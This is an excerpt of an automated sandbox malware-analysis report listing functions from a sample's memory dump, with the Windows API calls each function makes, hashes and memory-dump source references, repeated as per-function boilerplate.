                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 5100eb193a8e32dc88a471ebc8870601beaa6079f988118069340fa82a85435c
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 5100eb193a8e32dc88a471ebc8870601beaa6079f988118069340fa82a85435c
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    Function 0035DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 121d06ed7a472fd3d55d63bb8ddd68029cdd1c24e1505a8d8f61594e6e358188
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 121d06ed7a472fd3d55d63bb8ddd68029cdd1c24e1505a8d8f61594e6e358188
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    Function 0035DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 49ddfb5873ea9ee91676ab8b8b6d094e620282e5218200aae58ade727610ddf4
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 49ddfb5873ea9ee91676ab8b8b6d094e620282e5218200aae58ade727610ddf4
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    Function 0035DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: fa29deb9658b4a86a54d53f002ead7d0dfd4a004dc424dd31d5c71939c46e6a7
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: fa29deb9658b4a86a54d53f002ead7d0dfd4a004dc424dd31d5c71939c46e6a7
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    Function 0035DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 1b26dda791632e08f0baad03c56ed6d37a6bf7bc01e5dc026344c5f83ce4129a
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: 1b26dda791632e08f0baad03c56ed6d37a6bf7bc01e5dc026344c5f83ce4129a
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    Function 0035DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: ae5995f81e3bf8dc93fd4cbcb3419f23ba245b44ccef03a8055aed791dc9a93d
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: ae5995f81e3bf8dc93fd4cbcb3419f23ba245b44ccef03a8055aed791dc9a93d
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    Function 0035DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: a15fbca64b7a354e64098a6e926cc1e57afff5953e8b7605fe35115ad52d99ad
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: a15fbca64b7a354e64098a6e926cc1e57afff5953e8b7605fe35115ad52d99ad
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    Function 0035DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 2b96e7e06c7484fcf2bdbcc5e097387de5871e0a51b244742f6e6ff38eb8c966
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: 2b96e7e06c7484fcf2bdbcc5e097387de5871e0a51b244742f6e6ff38eb8c966
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    Function 0035DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: e01a6a9a385310ca3299ea98815b44213098f2229114d324d3095b073c4b9258
                                    • Instruction ID: 062267180570b5c379e8d68da049b29b6435c859ebdab8c6b0c25b65e39ebb8c
                                    • Opcode Fuzzy Hash: e01a6a9a385310ca3299ea98815b44213098f2229114d324d3095b073c4b9258
                                    • Instruction Fuzzy Hash: 94A0129516C102BC302E21007C02E76022CC0C0B123308809F80A9447095801C0C4430
                                    Function 0035DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: bd9d80bdb56c0967a1af997d8055154eb3038507e911249f865584153c2e2758
                                    • Instruction ID: 062267180570b5c379e8d68da049b29b6435c859ebdab8c6b0c25b65e39ebb8c
                                    • Opcode Fuzzy Hash: bd9d80bdb56c0967a1af997d8055154eb3038507e911249f865584153c2e2758
                                    • Instruction Fuzzy Hash: 94A0129516C102BC302E21007C02E76022CC0C0B123308809F80A9447095801C0C4430
                                    Function 00349EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEndOfFile.KERNELBASE(?,00349104,?,?,-00001964), ref: 00349EC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File
                                    • String ID:
                                    • API String ID: 749574446-0
                                    • Opcode ID: a8d92271048d023f311cc37ec897be709b53625e2e25f1590ce3963f2075ef64
                                    • Instruction ID: b10285269d6d22fca2d67a48db57422f0c8e19e01039d2b67ddb90f7926aa5de
                                    • Opcode Fuzzy Hash: a8d92271048d023f311cc37ec897be709b53625e2e25f1590ce3963f2075ef64
                                    • Instruction Fuzzy Hash: 42B012700A0005468E112B30CC048143A14FA1130670041606007C5060DB12C0026600
                                    Function 0035A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetCurrentDirectoryW.KERNELBASE(?,0035A587,C:\Users\user\Desktop,00000000,0038946A,00000006), ref: 0035A326
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory
                                    • String ID:
                                    • API String ID: 1611563598-0
                                    • Opcode ID: d0161c32feed2b7043f55e38d7a074d00590da3744040cd3b125ec442b3c7891
                                    • Instruction ID: 3d767b371c116e5914448343f2fa81dc2a66ed9564b6a310495aca12c6d58ebb
                                    • Opcode Fuzzy Hash: d0161c32feed2b7043f55e38d7a074d00590da3744040cd3b125ec442b3c7891
                                    • Instruction Fuzzy Hash: C1A01230194006568A111B30CC09C1577545760702F0086207006C00A0CB308854B501
                                    Function 003496D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • CloseHandle.KERNELBASE(000000FF,?,?,0034968F,?,?,?,?,00371FA1,000000FF), ref: 003496EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 7c6fd3d5c4d029ddd69dadf9a0ce13cce383824638401821ca6dc2033b3907f2
                                    • Instruction ID: df6e03f343dbcbfd730c2f6d33a88c64d7c09c78abe4dae84d710354db2d4b06
                                    • Opcode Fuzzy Hash: 7c6fd3d5c4d029ddd69dadf9a0ce13cce383824638401821ca6dc2033b3907f2
                                    • Instruction Fuzzy Hash: F0F0BE30046B008FDB328A20C549793B7E89B12335F058B1F80EB0B5A49764788D8B00

                                    Non-executed Functions

                                    Function 0035B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0035B971
                                    • EndDialog.USER32(?,00000006), ref: 0035B984
                                    • GetDlgItem.USER32(?,0000006C), ref: 0035B9A0
                                    • SetFocus.USER32(00000000), ref: 0035B9A7
                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0035B9E1
                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0035BA18
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0035BA2E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0035BA4C
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0035BA5C
                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035BA78
                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035BA94
                                    • _swprintf.LIBCMT ref: 0035BAC4
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0035BAD7
                                    • FindClose.KERNEL32(00000000), ref: 0035BADE
                                    • _swprintf.LIBCMT ref: 0035BB37
                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0035BB4A
                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0035BB67
                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0035BB87
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0035BB97
                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035BBB1
                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035BBC9
                                    • _swprintf.LIBCMT ref: 0035BBF5
                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0035BC08
                                    • _swprintf.LIBCMT ref: 0035BC5C
                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0035BC6F
                                      • Part of subcall function 0035A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035A662
                                      • Part of subcall function 0035A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E600,?,?), ref: 0035A6B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                    • API String ID: 797121971-1840816070
                                    • Opcode ID: b09b8c9b2110b61bf3569cff6ed7799f2fdfa4632213494a223906ac5e9519b0
                                    • Instruction ID: ea0c88d580c9cbe880e0aea84576214f3d355f7c12614780b8c56576312a63be
                                    • Opcode Fuzzy Hash: b09b8c9b2110b61bf3569cff6ed7799f2fdfa4632213494a223906ac5e9519b0
                                    • Instruction Fuzzy Hash: E19195B2548348BBD632DBA4DC49FFBB7ECEB4A701F040819FB49D6091D775A6088762
                                    Function 0034718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347191
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003472F1
                                    • CloseHandle.KERNEL32(00000000), ref: 00347301
                                      • Part of subcall function 00347BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347C04
                                      • Part of subcall function 00347BF5: GetLastError.KERNEL32 ref: 00347C4A
                                      • Part of subcall function 00347BF5: CloseHandle.KERNEL32(?), ref: 00347C59
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0034730C
                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0034741A
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00347446
                                    • CloseHandle.KERNEL32(?), ref: 00347457
                                    • GetLastError.KERNEL32 ref: 00347467
                                    • RemoveDirectoryW.KERNEL32(?), ref: 003474B3
                                    • DeleteFileW.KERNEL32(?), ref: 003474DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
